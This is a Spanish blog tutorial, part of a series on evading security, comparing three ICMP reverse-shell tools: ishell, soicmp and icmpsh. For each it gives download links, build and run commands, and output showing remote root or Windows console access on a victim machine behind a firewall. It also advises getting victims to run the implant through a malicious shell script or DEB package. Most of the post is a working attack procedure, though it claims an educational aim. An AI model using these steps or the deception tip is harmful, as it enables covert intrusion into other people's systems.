Inicio > Hacking, Networking, Services - Software > Intentando evadir mecanismos y restricciones de Seguridad – Burlando restricciones de Firewall usando protocolo ICMP – Parte X

Intentando evadir mecanismos y restricciones de Seguridad – Burlando restricciones de Firewall usando protocolo ICMP – Parte X

ICMP (Internet Control Message Protocol) es un protocolo basado en mensajes que permite, entre otras cosas, consultar si un host remoto puede ser alcanzado, por ejemplo, cuando se ejecuta un comando ping especificando una dirección IP o un nombre de dominio, realmente se utiliza protocolo ICMP para determinar si el host objetivo se encuentra al alcance.

>ping google.com

PING google.com (209.85.147.106) 56(84) bytes of data.

64 bytes from bru01m01-in-f106.1e100.net (209.85.147.106): icmp_req=1 ttl=52 time=65.3 ms

64 bytes from bru01m01-in-f106.1e100.net (209.85.147.106): icmp_req=2 ttl=52 time=65.2 ms

64 bytes from bru01m01-in-f106.1e100.net (209.85.147.106): icmp_req=3 ttl=52 time=64.0 ms

Partiendo de este punto, frecuentemente nos encontramos que las peticiones salientes de una máquina utilizando este protocolo, rara vez son restringidas por los firewall, lo que permite utilizar este protocolo para realizar conexiones reversas, permitiendo a un atacante tener acceso a una consola en la máquina objetivo pasando por detrás de las restricciones del firewall, sin embargo, actualmente existen pocas herramientas que aprovechen esta potencial vulnerabilidad. En esta entrada se realizaré un análisis sobre algunas de las herramientas disponibles para este propósito, su uso y sus resultados, así como las ventajas y desventajas que tienen cada una de estas.

ICMP SHELL – ISHELL

Se trata de una herramienta que permite a un atacante conectarse a un host remoto utilizando únicamente protocolo ICMP, como prácticamente todas las herramientas que utilizan este enfoque, esta compuesta por dos elementos, por un lado esta el servidor que se ejecuta como un demonio en la máquina de la victima y por otro lado esta la ejecución del programa en la máquina del cliente (atacante) que establecerá una conexión hacia el servidor por el protocolo ICMP.

Para su instalación es necesario descargar el proyecto en primer lugar desde aquí: http://prdownloads.sourceforge.net/icmpshell/ish-v0.2.tar.gz

Después de descargar y descomprimir el fichero, basta con ejecutar el comando “make” sobre el directorio raíz, especificando como parámetro la plataforma de ejecución (los valores validos son: linux, bsd y solaris)

>make linux

/bin/rm -f ish ishd

gcc -O2 -Wall -o ish ish.c ish_main.c

ish.c: In function ‘ish_prompt’:

ish.c:65: warning: ignoring return value of ‘read’, declared with attribute warn_unused_result

gcc -O2 -Wall -o ishd ishd.c ish_main.c ish_open.c

ishd.c: In function ‘edaemon’:

ishd.c:56: warning: ignoring return value of ‘chdir’, declared with attribute warn_unused_result

ishd.c: In function ‘ish_listen’:

ishd.c:92: warning: ignoring return value of ‘write’, declared with attribute warn_unused_result

strip ish

strip ishd

Ya se encuentra compilado y listo para ser utilizado.

>/ishd -h

ICMP Shell v0.2 (server) – by: Peter Kieltyka

usage: ./ishd [options]

options:

-h Display this screen

-d Run server in debug mode

-i Set session id; range: 0-65535 (default: 1515)

-t Set ICMP type (default: 0)

-p Set packet size (default: 512)

example:

./ishd -i 65535 -t 0 -p 1024

Desde la máquina de la víctima (servidor) se debe conseguir ejecutar el siguiente comando:

>./ishd -d -p 1024

Si lo anterior se consigue ejecutar correctamente en la máquina remota, ahora un atacante podrá conectarse a dicha máquina de la siguiente forma:

>./ish -t 0 -p 1024 192.168.1.34

ICMP Shell v0.2 (client) – by: Peter Kieltyka

————————————————–

Connecting to 192.168.1.34…done.

# whoami

root

hostname

debian

Como puede apreciarse, con este sencillo mecanismo se ha logrado obtener una consola en la máquina remota utilizando ICMP con tipo 0 (ICMP_ECHO_REPLY para enviar y recibir paquetes) saltando las restricciones del firewall en la máquina comprometida.

Ahora bien, el lector probablemente se preguntará, como conseguir que la víctima ejecute dicho script en su máquina? En realidad no hay una respuesta sencilla a esta pregunta, aquí probablemente jugará un papel vital la habilidad del atacante para “engañar” a su víctima, dado que estamos tratando de maquinas GNU/Linux/UNIX, probablemente uno de los mejores mecanismos será entregando al cliente un fichero malicioso con este ejecutable, ya sea con simplemente un shell script o un fichero de instalación malicioso (como por ejemplo un fichero DEB que ejecute este script), nuevamente, aquí juega un papel crucial las habilidades de las que disponga el atacante.

Ventajas Desventajas
Facilidad de Uso Se necesitan privilegios de Root para su ejecución en ambas máquinas, dado que utiliza sockets RAW.
La conexión se establece completamente utilizando ICMP por lo que probablemente el firewall no la bloqueará Solamente funciona en sistemas POSIX, lo que quiere decir que a la fecha no soporta plataformas Windows
Parece ser que no se encuentra bajo desarrollo o mantenimiento desde el 2002.

SoICMP

Partiendo del enfoque anteriormente explicado en el uso de ISHELL, SOICMP es otra herramienta que intenta conseguir los mismos resultados, es decir, enmascarar una conexión reversa entre víctima y atacante por medio de ICMP y el tráfico común que circula en las máquinas que en muchas ocasiones no es restringido por las reglas de un Firewall.

Sin embargo SOICMP tiene unas características que lo hacen un poco mas interesante que ISHELL, especialmente en el campo de la interoperabilidad, dado que es independiente de plataforma, lo que quiere decir que también soporta sistemas operativos Windows, algo que no se conseguía con ISHELL

Para instalarlo, es necesario en un sistema Linux, Windows, MacOS, etc. Es necesario obtenerlo desde http://billiejoex.altervista.org/Prj_Py_soicmp.shtml dependiendo de la plataforma.

NOTA: Es necesario tener instaladas algunas dependencias que se encuentran en la mayoría de repositorios de Ubuntu/Debian, sin embargo son librerías estándar que se encuentran incluidas en las extensiones de Python, por lo tanto es probable que no existan problemas al momento de ejecutar estos comandos.

Su uso es igual de sencillo que el de ISHELL, solamente basta con ejecutar el servidor, cliente y nada mas. Bajo un sistema operativo Linux es necesario ejecutar el programa con el interprete de Python o convertir el programa en ejecutable utilizando chmod.

El Programa servidor:

>python server.py -i eth0

server.py:24: DeprecationWarning: The popen2 module is deprecated. Use the subprocess module.

import popen2

Shell over ICMP server v0.5

Started at: 2011-Jun-12 21:08:38

Total available interfaces: 6

Outgoing packets buffer: 512

Logging: False

Listening on:

Alias number: [0]

Name: eth0

Net: 192.168.1.0

Mask: 255.255.255.0

Posteriormente en el lado del cliente se pueden enviar comandos que se ejecutaran en el lado del servidor, por ejemplo:

>python client.py –command=”ls” 192.168.1.33
dirAdastra
PhotosMusic

Changes

>python client.py –command=”whoami” 192.168.1.33

root

Como puede apreciarse se envía un comando arbitrario a la máquina objetivo y posteriormente retorna los resultados de dicho comando de vuelta a la máquina del atacante.

Ventajas Desventajas
Facilidad de uso e instalación Se necesitan privilegios de Root para su ejecución en ambas máquinas, dado que utiliza sockets RAW.
Independiente de plataforma, Escrito en Python. Parece ser que no se encuentra bajo desarrollo o mantenimiento desde el 2006
Permite su ejecución sobre varias interfaces de red de forma simultanea, permitiendo manejar varias conexiones por varios canales
Permite ejecutar ataques de MITM y Spoofing.

ICMPSH

Por ultimo (pero no menos importante) se encuentra ICMPSH, se trata de una herramienta que implementa el concepto de Consola reversa por medio de protocolo ICMP bastante bien, tiene una ventaja bastante valiosa en comparación con las otras 2 herramientas y es precisamente que no utiliza sockets RAW, ademas de que tanto slave (cliente) como master (servidor) no necesitan privilegios administrativos (root) para ser ejecutados correctamente, sin embargo el cliente (slave) solamente se ejecuta bajo sistemas operativos Windows (a la fecha de escribir esta publicación).
Por otro lado el concepto de cliente y servidor cambia un poco de las 2 herramientas anteriores, ya que en este caso, el cliente (slave) será la maquina objetivo y el servidor (master) sera la máquina del atacante, en este caso, el atacante iniciará un demonio en su máquina local esperando una conexión por parte del cliente (slave) una vez esta sea establecida, el atacante podrá acceder a la consola en la máquina remota.

Para usar esta herramienta es necesario descargarla en primer lugar desde: https://github.com/inquisb/icmpsh

Posteriormente de la máquina del atacante se debe proceder a la ejecución del siguiente comando.

>python icmpsh_m.py 192.168.1.33 192.168.1.40

En el caso anterior, la primera dirección IP corresponde a la dirección de origen, es decir, la dirección del atacante, mientras que la segunda dirección corresponde a la dirección del cliente, es decir, la dirección de la víctima.

En este punto el master creará un proceso que esperará a una conexión por parte del slave.

NOTA: La máquina del atacante debe establecer el valor de “1” al fichero /proc/sys/net/ipv4/icmp_echo_ignore_all para que las peticiones ICMP puedan ser transferidas correctamente entre master y slave, si este valor no es correctamente establecido no será posible crear una conexión por medio de ICMP.

Posteriormente desde el cliente se ejecuta el siguiente comando:

>icmpsh.exe -t 192.168.1.33 -d 500 -b 30 -s 128

Una vez este comando se ejecuta en la máquina de la víctima desde una consola DOS, se establece la conexión y en la máquina del atacante se verá lo siguiente

>python icmpsh_m.py 192.168.1.33 192.168.1.40

Microsoft Windows [Versión 6.1.7600]

Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

C:\Users\jdaanial\Downloads\inquisb-icmpsh>ipconfig

ipconfig

Configuración IP de Windows

Adaptador de Ethernet Conexión de Área local:

Sufijo DNS específico para la conexión. . :

Vínculo: dirección IPv6 local. . . : fe80::e8a4:4ab1:a075:3f0a%11

Dirección IPv4. . . . . . . . . . . . . . : 192.168.1.40

Máscara de subred . . . . . . . . . . . . : 255.255.255.0

Puerta de enlace predeterminada . . . . . : 192.168.1.1

Adaptador de túnel isatap.{8119F162-D5F2-4AF0-864A-17E4856AAC1F}:

Estado de los medios. . . . . . . . . . . : medios desconectados

Sufijo DNS específico para la conexión. . :

Adaptador de túnel Conexión de Área local* 4:

Sufijo DNS específico para la conexión. . :

Dirección IPv6 . . . . . . . . . . : 2001:0:5ef5:79fd:3803:150:3f57:fed7

Vínculo: dirección IPv6 local. . . : fe80::3803:150:3f57:fed7%13

C:\Users\jdaanial\Downloads\inquisb-icmpsh>

Finalmente las opciones disponibles en ICMPSH (Slave) son:

C:\Users\jdaanial\Downloads\inquisb-icmpsh>icmpsh.exe -h
icmpsh.exe [options] -t target
options:
-t host            host ip address to send ping requests to
-r                 send a single test icmp request and then quit
-d milliseconds    delay between requests in milliseconds (default is 200)
-o milliseconds    timeout in milliseconds
-h                 this screen
-b num             maximal number of blanks (unanswered icmp requests)
before quitting
-s bytes           maximal data buffer size in bytes (default is 64 bytes)In order to improve the speed, lower the delay (-d) between requests or
increase the size (-s) of the data buffer
Ventajas Desventajas
Facilidad de uso y soporte a múltiples plataformas El cliente (slave) solamente funciona en plataformas windows, por lo tanto las víctimas serán máquinas bajo plataforma windows
No son necesarios privilegios administrativos para su ejecución en cliente ni en servidor
Se consigue evadir correctamente restricciones de Firewall en entornos donde no se restringen los paquetes que viajan por ICMP
No utiliza Sockets RAW por lo tanto no se hacen necesarios privilegios de ROOT para la ejecución del cliente o el servidor

Finalmente, el objetivo de esta publicación es motivar al lector a profundizar en el código fuente de estas herramientas para conocer como consiguen hacer lo que hacen, se trata de herramientas no comerciales que en muchos casos han sido creadas simplemente por diversión o para realizar una prueba de conceptos teóricos, sin embargo es una excelente forma de adquirir conocimientos avanzados sobre ICMP y conseguir realizar un “bypass” de las reglas de un firewall.

  1. octubre 26, 2012 en 1:14 am

    Gracias, siempre voy complementando lo que me enseñan en la U con tus post 🙂

    Me gusta

  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: